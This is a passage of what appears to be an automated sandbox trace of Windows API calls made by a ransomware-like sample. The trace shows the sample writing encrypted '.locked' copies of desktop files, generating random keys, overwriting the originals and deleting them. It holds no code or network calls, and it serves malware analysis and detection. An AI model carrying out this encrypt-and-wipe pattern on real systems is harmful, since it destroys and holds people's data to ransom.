returned 1 [0263.001] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0263.010] SetEvent (hEvent=0x1d0) returned 1 [0263.010] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0263.018] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0263.018] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0263.022] SetEvent (hEvent=0x1e8) returned 1 [0263.022] SetEvent (hEvent=0x104) returned 1 [0263.022] SetEvent (hEvent=0x14c) returned 1 [0263.022] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0263.028] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0263.028] SetEvent (hEvent=0x150) returned 1 [0263.028] SetEvent (hEvent=0x1e8) returned 1 [0263.028] SetEvent (hEvent=0x104) returned 1 [0263.028] SetEvent (hEvent=0x14c) returned 1 [0263.028] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0263.028] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1276be94 | out: lpMode=0x1276be94) returned 0 [0263.028] WriteFile (in: hFile=0x1bc, lpBuffer=0x12670140*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x1276be64, lpOverlapped=0x0 | out: lpBuffer=0x12670140*, lpNumberOfBytesWritten=0x1276be64*=0x37, lpOverlapped=0x0) returned 1 [0263.028] CloseHandle (hObject=0x1bc) returned 1 [0263.029] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\9fTBKDfklFX1UCW.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9ftbkdfklfx1ucw.avi")) returned 1 [0263.062] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\9fTBKDfklFX1UCW.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9ftbkdfklfx1ucw.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0264.388] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1276be88 | out: lpMode=0x1276be88) returned 0 [0264.388] WriteFile (in: hFile=0x200, lpBuffer=0x1532a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276be78, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesWritten=0x1276be78*=0xfa000, lpOverlapped=0x0) returned 1 [0265.432] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0266.011] CloseHandle (hObject=0x200) returned 1 [0266.033] SetEvent (hEvent=0x1ac) returned 1 [0266.033] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0269.430] WriteFile (in: hFile=0x218, lpBuffer=0x15466000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1235fe78, lpOverlapped=0x0 | out: lpBuffer=0x15466000*, lpNumberOfBytesWritten=0x1235fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0269.465] CloseHandle (hObject=0x218) returned 1 [0269.685] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_273Oz.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_273oz.mp3")) returned 1 [0270.092] SetEvent (hEvent=0x1b8) returned 1 [0270.092] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0270.102] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0270.114] SetEvent (hEvent=0x190) returned 1 [0270.114] SetEvent (hEvent=0x134) returned 1 [0270.114] SetEvent (hEvent=0x1b8) returned 1 [0270.114] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0270.150] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0270.150] SetEvent (hEvent=0x150) returned 1 [0270.151] SetEvent (hEvent=0x1b8) returned 1 [0270.151] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\eT_8y6.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\et_8y6.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0270.315] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12637e88 | out: lpMode=0x12637e88) returned 0 [0270.315] SetEvent (hEvent=0x14c) returned 1 [0270.315] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0270.434] SetEvent (hEvent=0x1ac) returned 1 [0270.434] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0270.506] SetEvent (hEvent=0x21c) returned 1 [0270.506] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0270.602] WriteFile (in: hFile=0x188, lpBuffer=0x18150000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12637e78, lpOverlapped=0x0 | out: lpBuffer=0x18150000*, lpNumberOfBytesWritten=0x12637e78*=0xfa000, lpOverlapped=0x0) returned 1 [0270.639] CloseHandle (hObject=0x188) returned 1 [0270.920] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0273.189] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0273.252] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0273.269] SetEvent (hEvent=0x1dc) returned 1 [0273.269] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0273.466] SetEvent (hEvent=0x22c) returned 1 [0273.466] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0273.487] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PuTjWyxTe.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\putjwyxte.mp4")) returned 1 [0273.822] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0274.358] SetEvent (hEvent=0x214) returned 1 [0274.359] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0274.436] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0274.453] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\kY10RHpj1Ccj R.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ky10rhpj1ccj r.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0274.454] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x124a0d9c | out: lpMode=0x124a0d9c) returned 0 [0274.454] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0274.454] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766050 | out: pbBuffer=0x12766050) returned 1 [0274.454] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0274.454] WriteFile (in: hFile=0x200, lpBuffer=0x1238f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12637d78, lpOverlapped=0x0 | out: lpBuffer=0x1238f000*, lpNumberOfBytesWritten=0x12637d78*=0x80, lpOverlapped=0x0) returned 1 [0274.458] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0274.608] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0274.608] SetEvent (hEvent=0x150) returned 1 [0274.608] SetEvent (hEvent=0x220) returned 1 [0274.608] SetEvent (hEvent=0x14c) returned 1 [0274.608] SetEvent (hEvent=0x1ac) returned 1 [0274.608] ReadFile (in: hFile=0x1a4, lpBuffer=0x13fa2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12637d68, lpOverlapped=0x0 | out: lpBuffer=0x13fa2000*, lpNumberOfBytesRead=0x12637d68*=0x157c4, lpOverlapped=0x0) returned 1 [0274.613] WriteFile (in: hFile=0x200, lpBuffer=0x13fa2000*, nNumberOfBytesToWrite=0x157c4, lpNumberOfBytesWritten=0x12637d74, lpOverlapped=0x0 | out: lpBuffer=0x13fa2000*, lpNumberOfBytesWritten=0x12637d74*=0x157c4, lpOverlapped=0x0) returned 1 [0274.668] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0276.210] SetEvent (hEvent=0x150) returned 1 [0276.210] SetEvent (hEvent=0x220) returned 1 [0276.210] ReadFile (in: hFile=0x1a4, lpBuffer=0x13fa2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12637d68, lpOverlapped=0x0 | out: lpBuffer=0x13fa2000*, lpNumberOfBytesRead=0x12637d68*=0x0, lpOverlapped=0x0) returned 1 [0276.253] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0276.810] CloseHandle (hObject=0x200) returned 1 [0276.882] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0278.016] CloseHandle (hObject=0x1a4) returned 1 [0278.016] SetEvent (hEvent=0x21c) returned 1 [0278.016] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0278.097] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0278.132] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12657a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12657a24*=0xb) returned 1 [0278.148] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\-tLx.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\-tlx.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0278.149] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0278.149] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\-tLx.jpg.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\-tlx.jpg.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0278.150] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0278.150] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0278.150] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766060 | out: pbBuffer=0x12766060) returned 1 [0278.150] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0278.150] WriteFile (in: hFile=0x1a4, lpBuffer=0x125de000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12657d78, lpOverlapped=0x0 | out: lpBuffer=0x125de000*, lpNumberOfBytesWritten=0x12657d78*=0x80, lpOverlapped=0x0) returned 1 [0278.153] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0278.193] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0278.194] SetEvent (hEvent=0x150) returned 1 [0278.194] SetEvent (hEvent=0x1b8) returned 1 [0278.194] SetEvent (hEvent=0x220) returned 1 [0278.194] SetEvent (hEvent=0x21c) returned 1 [0278.194] ReadFile (in: hFile=0x1e0, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x12657d68*=0xc8b2, lpOverlapped=0x0) returned 1 [0278.200] WriteFile (in: hFile=0x1a4, lpBuffer=0x13134000*, nNumberOfBytesToWrite=0xc8b2, lpNumberOfBytesWritten=0x12657d74, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesWritten=0x12657d74*=0xc8b2, lpOverlapped=0x0) returned 1 [0278.242] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0278.781] ReadFile (in: hFile=0x1e0, lpBuffer=0x13134000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x13134000*, lpNumberOfBytesRead=0x12657d68*=0x0, lpOverlapped=0x0) returned 1 [0278.930] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0279.227] SetEvent (hEvent=0x20c) returned 1 [0279.227] CloseHandle (hObject=0x1a4) returned 1 [0279.309] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0280.150] CloseHandle (hObject=0x1e0) returned 1 [0280.151] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0280.151] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12657e94 | out: lpMode=0x12657e94) returned 0 [0280.151] WriteFile (in: hFile=0x1e0, lpBuffer=0x1234a380*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x12657e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a380*, lpNumberOfBytesWritten=0x12657e64*=0x3e, lpOverlapped=0x0) returned 1 [0280.151] CloseHandle (hObject=0x1e0) returned 1 [0280.153] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\-tLx.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\-tlx.jpg")) returned 1 [0280.440] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\-tLx.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\-tlx.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0280.515] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0282.234] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12657e88 | out: lpMode=0x12657e88) returned 0 [0282.234] WriteFile (in: hFile=0x1e0, lpBuffer=0x18164000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12657e78, lpOverlapped=0x0 | out: lpBuffer=0x18164000*, lpNumberOfBytesWritten=0x12657e78*=0xfa000, lpOverlapped=0x0) returned 1 [0282.265] CloseHandle (hObject=0x1e0) returned 1 [0282.394] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0282.861] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\-tLx.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\-tlx.jpg")) returned 1 [0283.508] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0283.586] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0283.635] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0283.699] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0283.779] SetEvent (hEvent=0x20c) returned 1 [0283.779] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0284.367] SetEvent (hEvent=0x1b8) returned 1 [0284.367] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0284.380] SetEvent (hEvent=0x104) returned 1 [0284.380] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0285.795] SetEvent (hEvent=0x198) returned 1 [0285.795] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0285.817] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12623a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12623a24*=0xb) returned 1 [0285.878] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\YqAV-p.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\yqav-p.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0285.878] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12623d9c | out: lpMode=0x12623d9c) returned 0 [0285.878] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\YqAV-p.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\yqav-p.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0286.662] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0287.007] SetEvent (hEvent=0x20c) returned 1 [0287.007] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12623d9c | out: lpMode=0x12623d9c) returned 0 [0287.007] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0287.471] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0287.536] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0287.620] SetEvent (hEvent=0x220) returned 1 [0287.620] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0287.805] SetEvent (hEvent=0x22c) returned 1 [0287.807] ReadFile (in: hFile=0x1f4, lpBuffer=0x154b8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1235fd68, lpOverlapped=0x0 | out: lpBuffer=0x154b8000*, lpNumberOfBytesRead=0x1235fd68*=0x13ce4, lpOverlapped=0x0) returned 1 [0287.811] WriteFile (in: hFile=0x1c8, lpBuffer=0x154b8000*, nNumberOfBytesToWrite=0x13ce4, lpNumberOfBytesWritten=0x1235fd74, lpOverlapped=0x0 | out: lpBuffer=0x154b8000*, lpNumberOfBytesWritten=0x1235fd74*=0x13ce4, lpOverlapped=0x0) returned 1 [0287.871] ReadFile (in: hFile=0x1f4, lpBuffer=0x154b8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1235fd68, lpOverlapped=0x0 | out: lpBuffer=0x154b8000*, lpNumberOfBytesRead=0x1235fd68*=0x0, lpOverlapped=0x0) returned 1 [0287.871] CloseHandle (hObject=0x1c8) returned 1 [0287.874] CloseHandle (hObject=0x1f4) returned 1 [0287.874] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x0 [0287.904] SetEvent (hEvent=0x190) returned 1 [0287.904] SetEvent (hEvent=0x134) returned 1 [0287.904] SetEvent (hEvent=0x1b8) returned 1 [0287.904] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0287.933] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0287.933] SetEvent (hEvent=0x150) returned 1 [0287.934] SetEvent (hEvent=0x1b8) returned 1 [0287.934] SetEvent (hEvent=0x134) returned 1 [0287.958] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\YqAV-p.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\yqav-p.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0288.012] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1261fe88 | out: lpMode=0x1261fe88) returned 0 [0288.012] WriteFile (in: hFile=0x1b0, lpBuffer=0x13356000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1261fe78, lpOverlapped=0x0 | out: lpBuffer=0x13356000*, lpNumberOfBytesWritten=0x1261fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0288.034] CloseHandle (hObject=0x1b0) returned 1 [0288.063] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\YqAV-p.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\yqav-p.bmp")) returned 1 [0288.124] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.366] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.413] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.453] SetEvent (hEvent=0x1dc) returned 1 [0288.453] SetEvent (hEvent=0x1b8) returned 1 [0288.453] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.558] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0288.559] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1276ae94 | out: lpMode=0x1276ae94) returned 0 [0288.559] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0288.559] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1235fe94 | out: lpMode=0x1235fe94) returned 0 [0288.559] SetEvent (hEvent=0x134) returned 1 [0288.559] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.690] SetEvent (hEvent=0x1dc) returned 1 [0288.690] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.729] SetEvent (hEvent=0x1dc) returned 1 [0288.729] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.773] SetEvent (hEvent=0x1dc) returned 1 [0288.773] SetEvent (hEvent=0x104) returned 1 [0288.773] SetEvent (hEvent=0x20c) returned 1 [0288.773] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.783] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.840] SetEvent (hEvent=0x1dc) returned 1 [0288.840] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.874] SetEvent (hEvent=0x190) returned 1 [0288.874] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.914] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0288.948] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.948] SetEvent (hEvent=0x1b8) returned 1 [0288.948] SetEvent (hEvent=0x190) returned 1 [0288.948] SetEvent (hEvent=0x1dc) returned 1 [0288.948] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0288.979] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb34, ulCount=0x10, ulNumEntriesRemoved=0x3254fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb34, ulNumEntriesRemoved=0x3254fb14) returned 0 [0288.979] SetEvent (hEvent=0x150) returned 1 [0288.979] SetEvent (hEvent=0x190) returned 1 [0288.979] SetEvent (hEvent=0x1dc) returned 1 [0288.979] SetEvent (hEvent=0x1b8) returned 1 [0288.979] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\RqMHt Jbqykr-i2R.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\rqmht jbqykr-i2r.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0289.056] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0289.660] SetEvent (hEvent=0x150) returned 1 [0289.660] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12623e88 | out: lpMode=0x12623e88) returned 0 [0289.660] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0289.834] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0290.170] SetEvent (hEvent=0x134) returned 1 [0290.170] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0290.193] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\dbMm7g.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\dbmm7g.png")) returned 1 [0290.257] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0290.404] SetEvent (hEvent=0x1dc) returned 1 [0290.404] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0290.437] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0290.530] SetEvent (hEvent=0x1dc) returned 1 [0290.530] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0290.537] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0290.538] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x124a0e94 | out: lpMode=0x124a0e94) returned 0 [0290.538] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\7g-3nq2zvxE4VIk.png" (normalized: 